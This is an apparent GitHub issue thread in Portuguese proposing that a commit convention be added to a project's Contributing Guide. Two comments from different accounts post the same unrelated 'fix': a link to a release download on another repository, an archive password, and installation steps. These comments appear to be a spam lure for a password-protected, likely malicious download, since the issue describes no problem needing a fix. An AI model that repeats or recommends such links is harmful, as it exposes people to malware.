### ISSUE TITLE
[SUGESTÃO] adicionar a convenção de commits no Guia de Contribuição 

### ISSUE THREAD

**Issue by Eladio9** [digitalinnovationone/dio-lab-open-source#46041]
**Sua sugestão está relacionada a um problema? Por favor descreva.**
Uma descrição clara e concisa de qual é o problema.
não

**Descreva a solução que você gostaria**
Uma descrição clara e concisa do que você quer que aconteça.
adicionar a convenção de commits no [Guia de Contribuição](https://github.com/digitalinnovationone/dio-lab-open-source/blob/main/CONTRIBUTING.md)
**Descreva as alternativas que você considerou**
Uma descrição clara e concisa de quaisquer soluções ou recursos alternativos que você considerou.
exemplos na tabela de tipos de commits
**Contexto adicional**
Adicione qualquer outro contexto ou captura de tela sobre a solicitação de recurso aqui.

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Eladio9** [comment]
aprendendo ainda
